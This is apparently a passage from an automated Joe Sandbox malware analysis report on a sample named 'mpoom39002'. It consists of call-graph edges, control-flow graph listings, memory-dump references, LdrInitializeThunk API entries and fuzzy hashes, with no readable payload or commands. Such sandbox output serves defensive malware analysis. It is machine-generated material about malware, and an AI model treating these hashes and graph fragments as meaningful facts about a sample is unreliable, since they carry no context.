12060->12062 12062->11883 12064 3f2322 LdrInitializeThunk 12063->12064 12066 3f23dc 12064->12066 12066->11884 12068 3f2322 LdrInitializeThunk 12067->12068 12070 3f23dc 12068->12070 12070->11884 12072 3f277a LdrInitializeThunk 12071->12072 12074 3f2834 12072->12074 12074->11885 12076 3f277a LdrInitializeThunk 12075->12076 12078 3f2834 12076->12078 12078->11885 12080 3f2bd2 LdrInitializeThunk 12079->12080 12082 3f2c8c 12080->12082 12082->11886 12084 3f2bd2 LdrInitializeThunk 12083->12084 12086 3f2c8c 12084->12086 12086->11886 12088 3f3005 LdrInitializeThunk 12087->12088 12090 3f30e4 12088->12090 12090->11887 12092 3f302a LdrInitializeThunk 12091->12092 12094 3f30e4 12092->12094 12094->11887 12096 3f3482 LdrInitializeThunk 12095->12096 12098 3f353c 12096->12098 12098->11888 12100 3f3482 LdrInitializeThunk 12099->12100 12102 3f353c 12100->12102 12102->11888 12104 3f38da LdrInitializeThunk 12103->12104 12106 3f3994 12104->12106 12106->11889 12108 3f38da LdrInitializeThunk 12107->12108 12110 3f3994 12108->12110 12110->11889 12112 3f3d32 LdrInitializeThunk 12111->12112 12114 3f3dec 12112->12114 12114->11890 12116 3f3d32 LdrInitializeThunk 12115->12116 12118 3f3dec 12116->12118 12118->11890 12120 3f418a LdrInitializeThunk 12119->12120 12122 3f4244 12120->12122 12122->11891 12124 3f418a LdrInitializeThunk 12123->12124 12126 3f4244 12124->12126 12126->11891 12128 3f45e2 LdrInitializeThunk 12127->12128 12130 3f469c 12128->12130 12130->11892 12132 3f45e2 LdrInitializeThunk 12131->12132 12134 3f469c 12132->12134 12134->11892 12136 3f4a3a LdrInitializeThunk 12135->12136 12138 3f4af4 12136->12138 12138->11893 12140 3f4a3a LdrInitializeThunk 12139->12140 12142 3f4af4 12140->12142 12142->11893 12144 3f824a LdrInitializeThunk 12143->12144 12146 3f8304 12144->12146 12146->11894 12148 3f824a LdrInitializeThunk 12147->12148 12150 3f8304 12148->12150 12150->11894 12152 3f86ca LdrInitializeThunk 12151->12152 12154 3f8784 12152->12154 12154->11895 12156 3f86ca LdrInitializeThunk 12155->12156 12158 3f8784 12156->12158 12158->11895 12160 3f8b22 LdrInitializeThunk 12159->12160 12162 3f8bdc 12160->12162 12162->11896 12164 3f8b22 LdrInitializeThunk 12163->12164 12166 3f8bdc 12164->12166 12166->11896 12168 3f8f7a LdrInitializeThunk 12167->12168 12170 3f9034 12168->12170 12170->11897 12172 3f8f7a LdrInitializeThunk 12171->12172 12174 3f9034 12172->12174 12174->11897 12176 3f93d2 LdrInitializeThunk 12175->12176 12178 3f948c 12176->12178 12178->11898 12180 3f93d2 LdrInitializeThunk 12179->12180 12182 3f948c 12180->12182 12182->11898 12184 3f982a LdrInitializeThunk 12183->12184 12186 3f98e4 12184->12186 12186->11899 12188 3f982a LdrInitializeThunk 12187->12188 12190 3f98e4 12188->12190 12190->11899 12192 3f9c82 LdrInitializeThunk 12191->12192 12194 3f9d3c 12192->12194 12194->11900 12196 3f9c82 LdrInitializeThunk 12195->12196 12198 3f9d3c 12196->12198 12198->11900 12200 3fa102 LdrInitializeThunk 12199->12200 12202 3fa1bd 12200->12202 12202->11901 12204 3fa102 LdrInitializeThunk 12203->12204 12206 3fa1bd 12204->12206 12206->11901 12208 3fa55a LdrInitializeThunk 12207->12208 12210 3fa614 12208->12210 12210->11902 12212 3fa55a LdrInitializeThunk 12211->12212 12214 3fa614 12212->12214 12214->11902 12216 3fa9b2 LdrInitializeThunk 12215->12216 12218 3faa6c 12216->12218 12218->11903 12220 3fa9b2 LdrInitializeThunk 12219->12220 12222 3faa6c 12220->12222 12222->11903 12224 3fae0a LdrInitializeThunk 12223->12224 12226 3faec4 12224->12226 12226->11904 12228 3fae0a LdrInitializeThunk 12227->12228 12230 3faec4 12228->12230 12230->11904 12232 3fb262 LdrInitializeThunk 12231->12232 12234 3fb31c 12232->12234 12234->11905 12236 3fb262 LdrInitializeThunk 12235->12236 12238 3fb31c 12236->12238 12238->11905 12240 3fb6ba LdrInitializeThunk 12239->12240 12242 3fb774 12240->12242 12242->11906 12244 3fb6ba LdrInitializeThunk 12243->12244 12246 3fb774 12244->12246 12246->11906 12248 3fbb12 LdrInitializeThunk 12247->12248 12250 1f2fa7 12248->12250 12251 3fbf48 12250->12251 12252 3fbf6a LdrInitializeThunk 12251->12252 12254 3fc024 12252->12254 12254->11908 12258 1febff 12255->12258 12256 1fecf2 LdrInitializeThunk 12257 1fece3 12256->12257 12257->11984 12258->12256 12258->12257 12260 1febc7 12259->12260 12261 1fecf2 LdrInitializeThunk 12260->12261 12262 1fece3 12260->12262 12261->12262 12262->11984 12264 1febc7 12263->12264 12265 1fecf2 LdrInitializeThunk 12264->12265 12266 1fece3 12264->12266 12265->12266 12266->11984

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 971 1f3b30-1f3b50 972 1f3b57-1f3d43 call 1f0364 * 4 971->972 973 1f3b52 971->973 994 1f45a3-1f45b9 972->994 973->972 995 1f45bf-1f45fd 994->995 996 1f3d48-1f3d51 994->996 997 1f3d58-1f3d76 996->997 998 1f3d53 996->998 1000 1f3d7c-1f3d9e call 1f1be0 997->1000 1001 1f4596-1f459c 997->1001 998->997 1007 1f4579-1f458f 1000->1007 1001->994 1003 1f459e 1001->1003 1003->994 1008 1f4595 1007->1008 1009 1f3da3-1f3dac 1007->1009 1008->1001 1010 1f3dae 1009->1010 1011 1f3db3-1f3ed2 call 1f0364 call 1f0384 * 5 1009->1011 1010->1011 1025 1f3ed7-1f3f04 1011->1025 1026 1f453c-1f455b 1025->1026 1027 1f3f0a-1f3f16 1025->1027 1032 1f455d-1f4569 1026->1032 1033 1f456a-1f456b 1026->1033 1028 1f3fb6-1f3fcc 1027->1028 1030 1f3f1b-1f3f24 1028->1030 1031 1f3fd2-1f4098 call 1f0384 1028->1031 1034 1f3f2b-1f3f5c call 1f0384 1030->1034 1035 1f3f26 1030->1035 1054 1f409f-1f40fa 1031->1054 1055 1f409a 1031->1055 1032->1033 1033->1007 1042 1f3f5e-1f3f9f call 1f0384 1034->1042 1043 1f3fa0-1f3fac 1034->1043 1035->1034 1042->1043 1045 1f3fae 1043->1045 1046 1f3fb3 1043->1046 1045->1046 1046->1028 1057 1f40fc 1054->1057 1058 1f4101-1f4105 1054->1058 1055->1054 1057->1058 1059 1f4107-1f4113 1058->1059 1060 1f4115-1f411f 1058->1060 1061 1f414c-1f41df call 1f0384 1059->1061 1062 1f4126-1f4146 1060->1062 1063 1f4121 1060->1063 1070 1f437c-1f43a3 1061->1070 1071 1f41e5-1f4275 1061->1071 1062->1061 1063->1062 1074 1f43a4-1f453b 1070->1074 1078 1f427c-1f42d7 1071->1078 1079 1f4277 1071->1079 1074->1026 1083 1f42de-1f42e2 1078->1083 1084 1f42d9 1078->1084 1079->1078 1086 1f42e4-1f42f0 1083->1086 1087 1f42f2-1f42fc 1083->1087 1084->1083 1090 1f4329-1f437a 1086->1090 1088 1f42fe 1087->1088 1089 1f4303-1f4323 1087->1089 1088->1089 1089->1090 1090->1074
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.610625948.00000000001F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001F0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_1f0000_mpoom39002.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: &55p
                                    • API String ID: 0-1955183375
                                    • Opcode ID: b370cce780b76540c004fb21444e7df7a71b3c101ac6bcd48c54242d55af7706
                                    • Instruction ID: d5cb7cc4bbdd1da5edb85e788a8ac0470dce5980a989ed38319291e27c392a7f
                                    • Opcode Fuzzy Hash: b370cce780b76540c004fb21444e7df7a71b3c101ac6bcd48c54242d55af7706
                                    • Instruction Fuzzy Hash: 12529D74E00228CFDB65DF65C890BADBBB2BF89300F1085EAD509AB255DB359E85CF50
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 1107 1f51c1-1f51f0 1108 1f51f7-1f52bc LdrInitializeThunk 1107->1108 1109 1f51f2 1107->1109 1115 1f55da-1f560c 1108->1115 1116 1f52c2-1f52da 1108->1116 1109->1108 1119 1f52dc 1116->1119 1120 1f52e1-1f52ea 1116->1120 1119->1120 1121 1f55cd-1f55d3 1120->1121 1122 1f52ef-1f5369 1121->1122 1123 1f55d9 1121->1123 1128 1f536f-1f53dd call 1f1c5c 1122->1128 1129 1f5425-1f5480 1122->1129 1123->1115 1139 1f53df-1f541f 1128->1139 1140 1f5420-1f5423 1128->1140 1141 1f5481-1f54cf 1129->1141 1139->1140 1140->1141 1146 1f55b8-1f55c3 1141->1146 1147 1f54d5-1f55b7 1141->1147 1149 1f55ca 1146->1149 1150 1f55c5 1146->1150 1147->1146 1149->1121 1150->1149
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.610625948.00000000001F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001F0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_1f0000_mpoom39002.jbxd
                                    Similarity
                                    • API ID: InitializeThunk
                                    • String ID:
                                    • API String ID: 2994545307-0
                                    • Opcode ID: 7698a1309ab70c38213df1379255477dd25da9a71a86fb194016699fc2280b41
                                    • Instruction ID: 94c2517834f6c86ac4729890d16eb25e1689ebf5bce1f3a103c640323205421c
                                    • Opcode Fuzzy Hash: 7698a1309ab70c38213df1379255477dd25da9a71a86fb194016699fc2280b41
                                    • Instruction Fuzzy Hash: 59D1D474E00218CFDB14DFA5D994BADBBB2FF89301F1081A9D409AB365DB355A86CF50
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.610707084.00000000003F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 003F0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_3f0000_mpoom39002.jbxd
                                    Similarity
                                    • API ID: InitializeThunk
                                    • String ID:
                                    • API String ID: 2994545307-0
                                    • Opcode ID: 81e57b75de30232c6ebcfe88031cd6919a43bc0751ac2ac5f289f01a52754365
                                    • Instruction ID: 968f86a8130317aa96bad22505efe1184834a65bb221cbdd66cfaecebef95708
                                    • Opcode Fuzzy Hash: 81e57b75de30232c6ebcfe88031cd6919a43bc0751ac2ac5f289f01a52754365
                                    • Instruction Fuzzy Hash: 6AC1B374E00218CFDB54DFA5D994BADBBB2BF88300F2084A9D409AB365DB355E85CF50
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.610707084.00000000003F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 003F0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_3f0000_mpoom39002.jbxd
                                    Similarity
                                    • API ID: InitializeThunk
                                    • String ID:
                                    • API String ID: 2994545307-0
                                    • Opcode ID: 920b7a3280a61416f17e23683d419708d74b85e354d3d823ac989e570603e543
                                    • Instruction ID: 0c73ccc7c501c88ec9cd1ee792a2cddb21ca5c65b4b7ae36878f8ab8fe370ace
                                    • Opcode Fuzzy Hash: 920b7a3280a61416f17e23683d419708d74b85e354d3d823ac989e570603e543
                                    • Instruction Fuzzy Hash: 21C1B374E00218CFDB54DFA5D994BADBBB2BF88300F2084AAD509AB365DB355E85CF50
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.610707084.00000000003F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 003F0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_3f0000_mpoom39002.jbxd
                                    Similarity
                                    • API ID: InitializeThunk
                                    • String ID:
                                    • API String ID: 2994545307-0
                                    • Opcode ID: 0e439f6a327c1b16521ba333ae888c363e266de6f3b4896ccd44571e784d6f81
                                    • Instruction ID: 5680fa8075a8f2ac4125714e18fbcee369bf199a8cd1cc776b4935d26ccabacf
                                    • Opcode Fuzzy Hash: 0e439f6a327c1b16521ba333ae888c363e266de6f3b4896ccd44571e784d6f81
                                    • Instruction Fuzzy Hash: B6C1B474E00218CFDB54DFA5D994BADBBB2BF88300F2085A9D409AB365DB355E85CF50
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.610707084.00000000003F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 003F0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_3f0000_mpoom39002.jbxd
                                    Similarity
                                    • API ID: InitializeThunk
                                    • String ID:
                                    • API String ID: 2994545307-0
                                    • Opcode ID: e49c5dfb90d7f4f4041fff9e4bc88b0bc84225592ba1fac4323d628fce02e08a
                                    • Instruction ID: aecb2dc34e2fb0a7409dfa14775d6d7852b64852573c11594676e3156ff336e1
                                    • Opcode Fuzzy Hash: e49c5dfb90d7f4f4041fff9e4bc88b0bc84225592ba1fac4323d628fce02e08a
                                    • Instruction Fuzzy Hash: 90C1B374E00218CFDB54DFA5D994BADBBB2BF88300F2084A9D909AB365DB355E85CF50
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 1756 3f3008-3f3028 1757 3f302f-3f30dc LdrInitializeThunk 1756->1757 1758 3f302a 1756->1758 1763 3f30e4-3f30f2 1757->1763 1758->1757 1764 3f340a-3f343c 1763->1764 1765 3f30f8-3f310f 1763->1765 1768 3f3116-3f311f 1765->1768 1769 3f3111 1765->1769 1770 3f33fd-3f3403 1768->1770 1769->1768 1771 3f3409 1770->1771 1772 3f3124-3f319a 1770->1772 1771->1764 1777 3f3256-3f32b0 1772->1777 1778 3f31a0-3f320e 1772->1778 1789 3f32b1-3f32ff 1777->1789 1787 3f3251-3f3254 1778->1787 1788 3f3210-3f3250 1778->1788 1787->1789 1788->1787 1794 3f33e8-3f33f3 1789->1794 1795 3f3305-3f33e7 1789->1795 1797 3f33fa 1794->1797 1798 3f33f5 1794->1798 1795->1794 1797->1770 1798->1797
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.610707084.00000000003F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 003F0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_3f0000_mpoom39002.jbxd
                                    Similarity
                                    • API ID: InitializeThunk
                                    • String ID:
                                    • API String ID: 2994545307-0
                                    • Opcode ID: fc7055cecd6afdab383ba53205b3ed13c29d19e6a9937ba6ba15bdb9f257c6a8
                                    • Instruction ID: 795382bdfdb565586ec25b995dbdb7a38fc897cf881b0ebcd26e88e1183eae10
                                    • Opcode Fuzzy Hash: fc7055cecd6afdab383ba53205b3ed13c29d19e6a9937ba6ba15bdb9f257c6a8
                                    • Instruction Fuzzy Hash: A0C1B374E00218CFDB54DFA5D994BADBBB2BF88300F2084AAD409AB365DB355E85CF50
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.610707084.00000000003F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 003F0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_3f0000_mpoom39002.jbxd
                                    Similarity
                                    • API ID: InitializeThunk
                                    • String ID:
                                    • API String ID: 2994545307-0
                                    • Opcode ID: e6be54e2a9d83aecb7eb8179cac572edd20e76860d1c1e892d0dbcbeb1d54bb1
                                    • Instruction ID: 792ba85ce200328c2baf686db5b5d4e3d6c2ee091d96f728d1bcb7bcda89ab94
                                    • Opcode Fuzzy Hash: e6be54e2a9d83aecb7eb8179cac572edd20e76860d1c1e892d0dbcbeb1d54bb1
                                    • Instruction Fuzzy Hash: 1DC1B474E00218CFDB54DFA5D994BADBBB2BF88300F2084AAD409AB365DB355E85CF50
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 1594 3f2300-3f2320 1595 3f2327-3f23d4 LdrInitializeThunk 1594->1595 1596 3f2322 1594->1596 1601 3f23dc-3f23ea 1595->1601 1596->1595 1602 3f2702-3f2734 1601->1602 1603 3f23f0-3f2407 1601->1603 1606 3f240e-3f2417 1603->1606 1607 3f2409 1603->1607 1608 3f26f5-3f26fb 1606->1608 1607->1606 1609 3f241c-3f2492 1608->1609 1610 3f2701 1608->1610 1615 3f254e-3f25a8 1609->1615 1616 3f2498-3f2506 1609->1616 1610->1602 1627 3f25a9-3f25f7 1615->1627 1625 3f2549-3f254c 1616->1625 1626 3f2508-3f2548 1616->1626 1625->1627 1626->1625 1632 3f25fd-3f26df 1627->1632 1633 3f26e0-3f26eb 1627->1633 1632->1633 1635 3f26ed 1633->1635 1636 3f26f2 1633->1636 1635->1636 1636->1608
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.610707084.00000000003F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 003F0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_3f0000_mpoom39002.jbxd
                                    Similarity
                                    • API ID: InitializeThunk
                                    • String ID:
                                    • API String ID: 2994545307-0
                                    • Opcode ID: 5b0b07ecf9265a4d620690f9eb3cc3d5e78b5765c7445c5a895b1ca8d4f345ea
                                    • Instruction ID: 46c4ed28ab2142d2a19b6fb63b1771330834bcdc16d99b5892f449b19ed389a6
                                    • Opcode Fuzzy Hash: 5b0b07ecf9265a4d620690f9eb3cc3d5e78b5765c7445c5a895b1ca8d4f345ea
                                    • Instruction Fuzzy Hash: 56C1B374E00218CFDB14DFA5D995BADBBB2BF88300F2084AAD409AB365DB355E85CF50
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.610707084.00000000003F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 003F0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_3f0000_mpoom39002.jbxd
                                    Similarity
                                    • API ID: InitializeThunk
                                    • String ID:
                                    • API String ID: 2994545307-0
                                    • Opcode ID: 26cba2fc8d2b9b2575cd87e3a99205974ee045088a687273f84c494398aff8e2
                                    • Instruction ID: 95a90983857429dd7ac7cd8f848879d016fd3d62c852903db2b148ba0defc5c4
                                    • Opcode Fuzzy Hash: 26cba2fc8d2b9b2575cd87e3a99205974ee045088a687273f84c494398aff8e2
                                    • Instruction Fuzzy Hash: 59C1B474E00218CFDB54DFA5D994BADBBB2BF88300F2084AAD409AB365DB355E85CF50
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.610707084.00000000003F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 003F0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_3f0000_mpoom39002.jbxd
                                    Similarity
                                    • API ID: InitializeThunk
                                    • String ID:
                                    • API String ID: 2994545307-0
                                    • Opcode ID: f5df0a74a019095b3540ae52c698907dc7838549d6bfe0cad6962b54995b7965
                                    • Instruction ID: ec5ec3cfc3b440484d2a1f50e3320c10854d5a9701fefab656056b3f54a56546
                                    • Opcode Fuzzy Hash: f5df0a74a019095b3540ae52c698907dc7838549d6bfe0cad6962b54995b7965
                                    • Instruction Fuzzy Hash: 67C1D374E00218CFDB14DFA5D994BADBBB2BF89300F2084AAD409AB365DB355E85CF50
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.610707084.00000000003F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 003F0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_3f0000_mpoom39002.jbxd
                                    Similarity
                                    • API ID: InitializeThunk
                                    • String ID:
                                    • API String ID: 2994545307-0
                                    • Opcode ID: 16d042ccafe11f681e693b27c8f9a0fd84d67fd7b3da2d7ed9f1d0edca29c37e
                                    • Instruction ID: 948ecf10a515f2a435eeb9c338d32ea231ebd629c1875d5f78bc264d0ade391a
                                    • Opcode Fuzzy Hash: 16d042ccafe11f681e693b27c8f9a0fd84d67fd7b3da2d7ed9f1d0edca29c37e
                                    • Instruction Fuzzy Hash: 32C1B474E00218CFDB14DFA5D994BADBBB2BF88300F2084AAD409AB365DB355E85CF50
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 1810 3f3460-3f3480 1811 3f3487-3f3534 LdrInitializeThunk 1810->1811 1812 3f3482 1810->1812 1817 3f353c-3f354a 1811->1817 1812->1811 1818 3f3862-3f3894 1817->1818 1819 3f3550-3f3567 1817->1819 1822 3f356e-3f3577 1819->1822 1823 3f3569 1819->1823 1824 3f3855-3f385b 1822->1824 1823->1822 1825 3f357c-3f35f2 1824->1825 1826 3f3861 1824->1826 1831 3f36ae-3f3708 1825->1831 1832 3f35f8-3f3666 1825->1832 1826->1818 1843 3f3709-3f3757 1831->1843 1841 3f36a9-3f36ac 1832->1841 1842 3f3668-3f36a8 1832->1842 1841->1843 1842->1841 1848 3f375d-3f383f 1843->1848 1849 3f3840-3f384b 1843->1849 1848->1849 1851 3f384d 1849->1851 1852 3f3852 1849->1852 1851->1852 1852->1824
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.610707084.00000000003F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 003F0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_3f0000_mpoom39002.jbxd
                                    Similarity
                                    • API ID: InitializeThunk
                                    • String ID:
                                    • API String ID: 2994545307-0
                                    • Opcode ID: 85147bf548b153cc86d88376f0c4d331f25582f21fed17807100cc73e87fb465
                                    • Instruction ID: af9ced3a39208caf5c5084e75a58f79702ce899aa5bab40ef9495ce04d07a43b
                                    • Opcode Fuzzy Hash: 85147bf548b153cc86d88376f0c4d331f25582f21fed17807100cc73e87fb465
                                    • Instruction Fuzzy Hash: 9BC1A274E00218CFDB54DFA5D994BADBBB2BF89300F2084A9D809AB365DB355E85CF50
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 1648 3f2758-3f2778 1649 3f277f-3f282c LdrInitializeThunk 1648->1649 1650 3f277a 1648->1650 1655 3f2834-3f2842 1649->1655 1650->1649 1656 3f2b5a-3f2b8c 1655->1656 1657 3f2848-3f285f 1655->1657 1660 3f2866-3f286f 1657->1660 1661 3f2861 1657->1661 1662 3f2b4d-3f2b53 1660->1662 1661->1660 1663 3f2b59 1662->1663 1664 3f2874-3f28ea 1662->1664 1663->1656 1669 3f29a6-3f2a00 1664->1669 1670 3f28f0-3f295e 1664->1670 1681 3f2a01-3f2a4f 1669->1681 1679 3f29a1-3f29a4 1670->1679 1680 3f2960-3f29a0 1670->1680 1679->1681 1680->1679 1686 3f2b38-3f2b43 1681->1686 1687 3f2a55-3f2b37 1681->1687 1689 3f2b4a 1686->1689 1690 3f2b45 1686->1690 1687->1686 1689->1662 1690->1689
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.610707084.00000000003F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 003F0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_3f0000_mpoom39002.jbxd
                                    Similarity
                                    • API ID: InitializeThunk
                                    • String ID:
                                    • API String ID: 2994545307-0
                                    • Opcode ID: 09e6b2baca31bc880c40478ff3c2833b55c04fae58de678d9ab3f2bd9e5e491e
                                    • Instruction ID: d0f5db2f7f628a8b3388825f8c9de750a5ff09d276e406415f82fe6775ddad76
                                    • Opcode Fuzzy Hash: 09e6b2baca31bc880c40478ff3c2833b55c04fae58de678d9ab3f2bd9e5e491e
                                    • Instruction Fuzzy Hash: 55C1A274E00218CFDB54DFA5D994BADBBB2BF88300F2085A9D809AB365DB355E85CF50
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.610707084.00000000003F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 003F0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_3f0000_mpoom39002.jbxd
                                    Similarity
                                    • API ID: InitializeThunk
                                    • String ID:
                                    • API String ID: 2994545307-0
                                    • Opcode ID: 7ae6eddbbd122f50f414259d8e6d29119b20d181d6e453f56def0355ac175e17
                                    • Instruction ID: 10f47b951ba816a74e569d0015b8d2cc1ccd4e70a982e29b93b794ae21510f72
                                    • Opcode Fuzzy Hash: 7ae6eddbbd122f50f414259d8e6d29119b20d181d6e453f56def0355ac175e17
                                    • Instruction Fuzzy Hash: 3BC1B374E00218CFDB54DFA5D994BADBBB2BF88300F2085AAD409AB365DB355E85CF50
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 1486 3f1a50-3f1a70 1487 3f1a77-3f1b24 LdrInitializeThunk 1486->1487 1488 3f1a72 1486->1488 1493 3f1b2c-3f1b3a 1487->1493 1488->1487 1494 3f1e52-3f1e84 1493->1494 1495 3f1b40-3f1b57 1493->1495 1498 3f1b5e-3f1b67 1495->1498 1499 3f1b59 1495->1499 1500 3f1e45-3f1e4b 1498->1500 1499->1498 1501 3f1b6c-3f1be2 1500->1501 1502 3f1e51 1500->1502 1507 3f1c9e-3f1cf8 1501->1507 1508 3f1be8-3f1c56 1501->1508 1502->1494 1519 3f1cf9-3f1d47 1507->1519 1517 3f1c99-3f1c9c 1508->1517 1518 3f1c58-3f1c98 1508->1518 1517->1519 1518->1517 1524 3f1d4d-3f1e2f 1519->1524 1525 3f1e30-3f1e3b 1519->1525 1524->1525 1527 3f1e3d 1525->1527 1528 3f1e42 1525->1528 1527->1528 1528->1500
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.610707084.00000000003F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 003F0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_3f0000_mpoom39002.jbxd
                                    Similarity
                                    • API ID: InitializeThunk
                                    • String ID:
                                    • API String ID: 2994545307-0
                                    • Opcode ID: 89e11bda14ebc2a1e1f6e89a21850fa2a48691a1ac0c7ad047b34f39fedbd2e3
                                    • Instruction ID: a8fa70bba0f5e4865fe40558c1c6096bc94665336b414153c14f938c06c49f9c
                                    • Opcode Fuzzy Hash: 89e11bda14ebc2a1e1f6e89a21850fa2a48691a1ac0c7ad047b34f39fedbd2e3
                                    • Instruction Fuzzy Hash: 85C1B474E00218CFDB54DFA5D994BADBBB2BF88300F2084A9D809AB365DB355E85DF50
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 1324 3f0d48-3f0d68 1325 3f0d6f-3f0e1c LdrInitializeThunk 1324->1325 1326 3f0d6a 1324->1326 1331 3f0e24-3f0e32 1325->1331 1326->1325 1332 3f114a-3f117c 1331->1332 1333 3f0e38-3f0e4f 1331->1333 1336 3f0e56-3f0e5f 1333->1336 1337 3f0e51 1333->1337 1338 3f113d-3f1143 1336->1338 1337->1336 1339 3f1149 1338->1339 1340 3f0e64-3f0eda 1338->1340 1339->1332 1345 3f0f96-3f0ff0 1340->1345 1346 3f0ee0-3f0f4e 1340->1346 1355 3f0ff1-3f103f 1345->1355 1356 3f0f91-3f0f94 1346->1356 1357 3f0f50-3f0f90 1346->1357 1362 3f1128-3f1133 1355->1362 1363 3f1045-3f1127 1355->1363 1356->1355 1357->1356 1365 3f113a 1362->1365 1366 3f1135 1362->1366 1363->1362 1365->1338 1366->1365
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.610707084.00000000003F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 003F0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_3f0000_mpoom39002.jbxd
                                    Similarity
                                    • API ID: InitializeThunk
                                    • String ID:
                                    • API String ID: 2994545307-0
                                    • Opcode ID: 43ff06171d27b4a14d47c730a41185d44658e8b9db2a2467e7edaf6cb5776e70
                                    • Instruction ID: 28c7e75ccfdda9a07f8ded53fbe3c5a7d519c0cea071f1823886a5963024ab13
                                    • Opcode Fuzzy Hash: 43ff06171d27b4a14d47c730a41185d44658e8b9db2a2467e7edaf6cb5776e70
                                    • Instruction Fuzzy Hash: 34C1C374E00218CFDB54DFA5D994BADBBB2BF88300F2084A9D909AB365DB355E85CF50
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.610707084.00000000003F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 003F0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_3f0000_mpoom39002.jbxd
                                    Similarity
                                    • API ID: InitializeThunk
                                    • String ID:
                                    • API String ID: 2994545307-0
                                    • Opcode ID: 4e9a79426aa8acfcf2cf8cd029f79838a68489f7140bd22601f2240177354a7c
                                    • Instruction ID: 2403ce56b3c1ced990ab15663a453607eb92d84bfcaeb194af6852b634a8e500
